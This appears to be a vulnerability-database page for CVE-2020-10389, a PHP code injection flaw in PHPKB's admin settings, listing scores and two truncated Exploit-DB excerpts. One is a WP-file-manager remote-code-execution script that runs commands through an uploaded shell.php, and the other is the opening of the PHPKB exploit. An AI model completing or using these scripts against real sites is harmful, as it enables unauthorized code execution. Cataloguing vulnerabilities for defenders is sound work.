CVE-2020-10389
published 2020-03-12CVE-2020-10389: admin/save-settings.php in Chadha PHPKB Standard Multi-Language 9 allows remote attackers to achieve Code Execution by injecting PHP code into any POST…
PriorityP351high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
4.88%
91.0th percentile
admin/save-settings.php in Chadha PHPKB Standard Multi-Language 9 allows remote attackers to achieve Code Execution by injecting PHP code into any POST parameter when saving global settings.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chadhaajay | phpkb | — | — |
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
exploitdb·2023-04-03·CVSS 10.0
CVE-2020-25213 [CRITICAL] WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
---
#!/usr/bin/env
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint
def handler(sig,frame):
print ("[!]Saliendo")
sys.exit(1)
signal.signal(signal.SIGINT,handler)
def commandexec(command):
exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
params = {
"cmd":command
}
r=requests.get(exec_url,params=params)
soup = BeautifulSoup(r.text, 'html.parser')
te
Exploit-DB
PHPKB Multi-Language 9 - Authenticated Remote Code Execution
exploitdb·2020-03-16·CVSS 7.2
CVE-2020-10389 [HIGH] PHPKB Multi-Language 9 - Authenticated Remote Code Execution
PHPKB Multi-Language 9 - Authenticated Remote Code Execution
---
# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-03-15
# Exploit Author: Antonio Cannito
# Vendor Homepage: https://www.knowledgebase-script.com/
# Software Link: https://www.knowledgebase-script.com/pricing.php
# Version: Multi-Language v9
# Tested on: Windows 8.1 / PHP 7.4.3
# CVE : CVE-2020-10389
#!/usr/bin/env python3
import argparse
import requests
#Parsing arguments
parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10389 - Authenticated Remote Code Execution in Chadha PHPKB Standard Multi-Language 9 in admin/save-settings.php")
parser.add_argument("url", type=str, help="PHPKB's base path")
parser.add_argument("username", type=str, help="S
http://antoniocannito.it/?p=137#rce2http://packetstormsecurity.com/files/156751/PHPKB-Multi-Language-9-Authenticated-Remote-Code-Execution.htmlhttps://antoniocannito.it/phpkb1#authenticated-remote-code-execution-cve-2020-10389https://www.exploit-db.com/exploits/48219http://antoniocannito.it/?p=137#rce2http://packetstormsecurity.com/files/156751/PHPKB-Multi-Language-9-Authenticated-Remote-Code-Execution.htmlhttps://antoniocannito.it/phpkb1#authenticated-remote-code-execution-cve-2020-10389https://www.exploit-db.com/exploits/48219
2020-03-12
Published